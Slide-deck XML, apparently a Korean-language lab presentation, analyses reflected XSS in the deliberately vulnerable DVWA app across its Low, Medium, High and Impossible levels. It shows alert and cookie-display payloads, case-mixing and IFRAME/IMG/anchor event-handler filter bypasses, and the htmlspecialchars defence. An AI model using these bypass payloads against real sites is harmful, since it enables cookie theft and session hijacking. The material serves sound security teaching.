            <a:off x="4237107" y="4896162"/>
            <a:ext cx="3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3B69"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="213B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28268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Low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레벨 공격 방법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156" y="3077881"/>
            <a:ext cx="6120154" cy="64041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&lt;script&gt;alert(‘SUCCESS’)&lt;/script&gt;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후 전송 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B40115-9DBA-46D4-AFDB-701830911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90" y="1920521"/>
            <a:ext cx="5687219" cy="116221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8D6684-BE42-4AFA-B154-A557E69A3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07" y="5871410"/>
            <a:ext cx="5915851" cy="2201585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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EAF0F316-F661-48AA-9108-5D888397B2F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="8293482"/>
            <a:ext cx="6120154" cy="1082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레벨 수준을 성공적으로 악용했음을 확인하는 팝업 상자가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띄워진 것을 확인 할 수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있다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FD6A9F7-E938-40CF-B537-24C16756B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953" y="3856107"/>
            <a:ext cx="5973206" cy="1095291"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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7FAF864B-BD62-4AF2-8239-1FDA76EBC0B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209004" y="5025042"/>
            <a:ext cx="6120154" cy="640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en-US" altLang="ko-KR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=“”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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=“alert(‘SUCCESS’)”&gt;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후 전송 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5611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6C5898-8357-4C26-8A5A-064F4672E94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94FB019-8F79-4C25-89D9-4E6888C5E8CB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E22650C1-1F7F-4CA1-9AE7-F3739B437E13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813" y="3048507"/>
            <a:ext cx="4485405" cy="1352903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DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4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를 활용한</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4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</a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4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취약점 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4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분석</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="4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46AB0-0C28-4D7C-8C3B-D67E479EA7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473395" y="3063239"/>
            <a:ext cx="1203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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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912719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Low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레벨 공격 방법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156" y="3304367"/>
            <a:ext cx="6120154" cy="64041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&lt;script&gt;alert(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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’)&lt;/script&gt;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후 전송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40A168-B479-4492-A13A-8E60367A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90" y="1905281"/>
            <a:ext cx="6050310" cy="1257475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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ED89F000-27EE-402F-BF3B-C9B6070E0255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356846" y="8000719"/>
            <a:ext cx="6120154" cy="640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B1FF2F-616B-4BE5-8EEE-0E9C44428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8" y="4067591"/>
            <a:ext cx="5902671" cy="31511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639D4D-A98E-4085-AC1B-B24917F60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686" y="4508364"/>
            <a:ext cx="5890318" cy="203392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4B3C99E-A8EB-4AF0-92AB-B4D494919265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551824" y="5122670"/>
            <a:ext cx="5845180" cy="2182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8634CE-1D8B-40C6-9419-D9691E56F821}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540402" y="6772580"/>
            <a:ext cx="3513438" cy="2182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내용 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27385BD0-19B9-4F8A-AE2B-F558BC808A1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311156" y="7405808"/>
            <a:ext cx="6120154" cy="1993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삽입한 자바스크립트가 실행되어 클라이언트의 쿠키 값을 출력해주는 창을 띄운 것을 볼 수 있다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확인해본 결과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쿠키값이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그대로 보이는 것을 확인 할 수 있다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2736618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6" name="내용 개체 틀 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF477845-5E7D-4466-9756-5F4029BAD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38" y="1914701"/>
            <a:ext cx="6120154" cy="4675284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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Medium Reflected XSS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638" y="7119730"/>
            <a:ext cx="6120154" cy="18878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왼쪽탭에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Security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레벨로 설정 해준 뒤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클릭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왼쪽탭에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XSS(Reflected)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메뉴를  클릭 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523CE00-8A8B-4AD9-BF68-F25C7EBCD303}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487254" y="6067561"/>
            <a:ext cx="1260441" cy="2073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46FD1B-D9F7-42B7-93F5-283AA0CBB7CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1960475" y="5163375"/>
            <a:ext cx="772732" cy="9536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89A6F1-ED92-4A16-8E05-EF0C1EB1EE62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2745719" y="5176256"/>
            <a:ext cx="671822" cy="2176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56312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Medium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소스 코드 분석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C68D16-BB65-4811-8DAB-5069954EB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91" y="1930402"/>
            <a:ext cx="6050309" cy="3739718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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D1204280-605F-44B9-A791-D59933D3DCB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311156" y="5896198"/>
            <a:ext cx="6120154" cy="31792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F9245E0C-8AF3-43FE-960E-9D96B91114D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357464" y="5916520"/>
            <a:ext cx="6246532" cy="3830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GET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방식으로 전달되는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변수의 값이 존재하는지 확인 후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 NULL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아니면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변수의 값 출력한다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str_replace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사용하여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‘&lt;script&gt;’ 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입력될 시 입력 된 값을 공백으로 필터링한다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//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대소문자 구분 안함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행에서 필터링을 수행 한 후 사용자가 제공 한 입력을 다시 반영하여 출력한다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:&lt;script&gt;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입력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 필터링 되어 결과값이 출력되지 않는다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대소문자를 구분하지 않음으로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‘&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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&gt;’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같이 대소문자를 섞어 우회하여 공격한다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en-US" altLang="ko-KR" sz="1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84E1E2-5861-458D-927E-3F34C476E792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="673603" y="3988675"/>
            <a:ext cx="4560550" cy="2838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BEA292-D8E9-49FA-B48B-86C253BF504A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490166" y="3524241"/>
            <a:ext cx="5652726" cy="2838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7374BC-FD36-4154-B325-E2715E551AFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="673603" y="4650408"/>
            <a:ext cx="2755397" cy="2838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E82E43B-3E59-41D9-94BC-2ADC941D264C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754880" y="3011039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6647B5-243E-4E98-ACF9-F83968EA89E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986215" y="2897945"/>
            <a:ext cx="3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3B69"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="213B69"/>
              </a:solidFill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A956220C-ADC0-4C89-A1FD-EFCE8805E426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5367605" y="3926420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0E320-8F43-49C4-9DE8-84855D16C019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5724958" y="3926419"/>
            <a:ext cx="3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3B69"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="213B69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6141F59C-442A-48B2-A4FC-3082A01BF5B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2787410" y="5044488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A5368E-8E18-4F01-90AD-5E1A2C7F6D8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3058618" y="5168115"/>
            <a:ext cx="3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3B69"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="213B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642968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546667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Medium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레벨 공격 방법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1156" y="3267378"/>
            <a:ext cx="6120154" cy="64041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&gt;alert(‘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’)&lt;/Script&gt;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후 전송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EAF0F316-F661-48AA-9108-5D888397B2F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="8293482"/>
            <a:ext cx="6120154" cy="1082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5FE57C-F9A7-4A07-92BE-2F3E437E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6" y="1814496"/>
            <a:ext cx="6165844" cy="147658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6756268-8F40-4A4F-8F25-6ACE3A31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3" y="3805815"/>
            <a:ext cx="6120154" cy="33832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00FF98E-9B79-42F6-A142-2AE528542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65" y="4185860"/>
            <a:ext cx="5915025" cy="149509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4F6238C9-6CC9-44DD-8361-998480F9CA0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494951" y="4617743"/>
            <a:ext cx="5845180" cy="2182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04D4AE1-5DB5-48C3-8BDB-F1E61D773260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506410" y="6189483"/>
            <a:ext cx="4160183" cy="28055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내용 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A348CDB-7A0A-460F-B8CB-2407EE63216D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368923" y="7326649"/>
            <a:ext cx="6120154" cy="19932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삽입한 자바스크립트가 실행되어 클라이언트의 쿠키 값을 출력해주는 창을 띄운 것을 볼 수 있다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또한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확인해본 결과 쿠키 값이 그대로 보이는 것을 확인 할 수 있다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047233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High Reflected XSS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638" y="7119730"/>
            <a:ext cx="6120154" cy="18878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왼쪽탭에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Security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레벨로 설정 해준 뒤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클릭한다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왼쪽탭에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XSS(Reflected)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메뉴를  클릭 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C34A95-F46A-4248-83C9-8BE6A4284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51" y="1831141"/>
            <a:ext cx="6050309" cy="50201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23CE00-8A8B-4AD9-BF68-F25C7EBCD303}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481648" y="6336585"/>
            <a:ext cx="1260441" cy="2073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46FD1B-D9F7-42B7-93F5-283AA0CBB7CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1940155" y="5356415"/>
            <a:ext cx="772732" cy="1095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89A6F1-ED92-4A16-8E05-EF0C1EB1EE62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705079" y="5359136"/>
            <a:ext cx="671822" cy="2176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48923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High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소스 코드 분석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8EF491-83C1-4EAE-B7D8-CE9DA41E6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44" y="1910080"/>
            <a:ext cx="6050309" cy="31911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</p:pic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9E183652-3187-4E61-B181-1E5C366A3660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357464" y="5148239"/>
            <a:ext cx="6246532" cy="3830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GET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방식으로 전달되는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변수의 값이 존재하는지 확인 후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 NULL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아니면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변수의 값 출력한다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en-US" altLang="ko-KR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preg_replace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함수를 이용하여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*c*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r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 규칙에 해당하는 문자열을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–</a:t>
            </a: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옵션을 사용하여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대소문자 구분하지 않고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공백처리 한다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just">
              <a:lnSpc>
                <a:spcPct val="10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"&lt;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", "&lt;SCRIPT", "&lt;SC\RIPT", "&lt;/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",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"&lt;/SCRIPT", "&lt;/SC/**/RIPT“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등 </a:t>
            </a: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행에 해당하는 규칙들은</a:t>
            </a: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 공백처리 된다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&lt;script&gt;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이외의 다른 자바스크립트 코드를 삽입하여 공격한다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622613-A1EB-4020-B80F-1DAAE02C7875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710955" y="3673366"/>
            <a:ext cx="5649952" cy="2584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98377D-1CE5-4FF2-88D0-3DB1723080E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="3272675"/>
            <a:ext cx="4872140" cy="2584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02D88A30-CCBA-4498-8074-8B98A74D4A93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754880" y="2777359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E164F0-65FA-483E-9033-BB2C8FE19AC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986215" y="2664265"/>
            <a:ext cx="3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3B69"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="213B69"/>
              </a:solidFill>
            </a:endParaRPr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E13EBE03-206A-4D7D-8F0A-DF772EE3CB0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4003040" y="4054412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709AB-BCA4-4488-B6D8-1869312B097D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4237107" y="4195122"/>
            <a:ext cx="3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3B69"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="213B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075136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536511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80518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High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레벨 공격 방법 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53160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E17FB5E-6151-435D-ABCD-CAA2923B4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34" y="1925090"/>
            <a:ext cx="5947468" cy="1138287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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9BF62167-608F-46D6-AF61-24954B32DB76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311156" y="3077881"/>
            <a:ext cx="6120154" cy="1636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7E6273F-092D-438B-911C-C6F301ED8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81" y="6196005"/>
            <a:ext cx="5958929" cy="1901963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="내용 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80724E1A-61E3-43FB-A000-A2C0AE13D48F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356846" y="8097968"/>
            <a:ext cx="6074464" cy="136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</a:t>
            </a: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페이지를 현재 페이지에  포함 시켜준다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&lt;IFRAME SRC=# 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onmouseover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="alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i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)"&gt;&lt;/IFRAME&gt;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7AFCE8-9B20-47C7-B2EC-88175F49ECFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471764" y="3113330"/>
            <a:ext cx="61201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\&lt;a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onmouseover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="alert(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)"\&gt;ATTACK!!!\&lt;/a\&gt;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79530D57-572A-4005-8B9B-0A2A53835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73" y="4302533"/>
            <a:ext cx="5958929" cy="12001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8558B6-1547-4666-88D0-4CDB8C019A09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442573" y="5575978"/>
            <a:ext cx="612015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=x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=alert(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);&gt;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EF949D-4485-446E-BBF0-64A88115C2D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4666105" y="2475416"/>
            <a:ext cx="165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[A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태그사용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7E6D5-1B8E-49FA-9785-B3336510AECB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4718195" y="4914526"/>
            <a:ext cx="165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en-US" altLang="ko-KR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태그사용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8F6D8-4D47-4484-B72A-2E862EB164CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4278315" y="7170521"/>
            <a:ext cx="211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[IFRAME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태그사용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4EC2C69B-5E42-4106-A084-C74F84EDE9CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="4314972" y="2475417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7DD91D4C-392B-4DC7-AC04-9F0513E7E01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="4343603" y="4900673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6FB0F71B-1C5E-4555-8673-C8F3339A09A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="3886250" y="7188720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8221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Impossible Reflected XSS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638" y="7119730"/>
            <a:ext cx="6120154" cy="18878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왼쪽탭에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Security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레벨로 설정 해준 뒤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submit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클릭한다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왼쪽탭에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XSS(Reflected)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메뉴를  클릭 후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진행한다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247408-24E5-4492-BB1A-B02DF09AC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6" y="1775147"/>
            <a:ext cx="6068114" cy="505371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523CE00-8A8B-4AD9-BF68-F25C7EBCD303}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451168" y="6306105"/>
            <a:ext cx="1260441" cy="2073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46FD1B-D9F7-42B7-93F5-283AA0CBB7CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919835" y="5346255"/>
            <a:ext cx="772732" cy="10951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089A6F1-ED92-4A16-8E05-EF0C1EB1EE62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2694919" y="5359136"/>
            <a:ext cx="671822" cy="2176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766473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39D889-5591-4A1F-A94C-D8376459F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64" y="1888932"/>
            <a:ext cx="6003443" cy="3343465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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Impossible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소스 코드 분석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9E183652-3187-4E61-B181-1E5C366A3660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357464" y="5495115"/>
            <a:ext cx="6246532" cy="383066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CRRF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공격을 방지하기 위해 세션 소유자와 요청 메시지 생성자를 비교하여 세션을 체크한다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GET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방식으로 전달된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변수를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htmlspecialchars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함수로 처리한 후에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출력한다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[XSS Attack special characters]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('&amp;')는 '&amp;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amp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;'로 변환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('&gt;')는 '&amp;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;'로 변환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('&lt;')는 '&amp;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;'로 변환</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0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('"')는 '&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="ko-KR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quot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;'로 변환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98377D-1CE5-4FF2-88D0-3DB1723080E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="3510937"/>
            <a:ext cx="2164109" cy="2584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A1F93E-36ED-4F12-9CD3-BE57BCC57DD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="497093" y="3051319"/>
            <a:ext cx="3770107" cy="2584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B742EBA8-DDE6-48EB-8E23-6AE120A47E80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="4388859" y="2995864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E7644C-C7C2-4CBA-BE38-B7B3330CCF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4510518" y="3209350"/>
            <a:ext cx="3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3B69"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="213B69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08294F5A-CF59-4C9F-99C3-3BD700064C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2102859" y="3837326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0A3E1-F039-4F33-ABB2-915F9E8DC975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2342318" y="3970555"/>
            <a:ext cx="3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3B69"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="213B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40174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B39D889-5591-4A1F-A94C-D8376459F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78" y="2113278"/>
            <a:ext cx="6003443" cy="3343465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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Impossible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소스 코드 분석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382205" y="1928669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9E183652-3187-4E61-B181-1E5C366A3660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382205" y="5670791"/>
            <a:ext cx="6246532" cy="370365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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800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name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변수의 값 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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출력하기 전에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i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htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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().php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" dirty="0" err="1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htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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따라 모든 특수 문자를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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변환한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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특수문자를 특수문자를 </a:t>
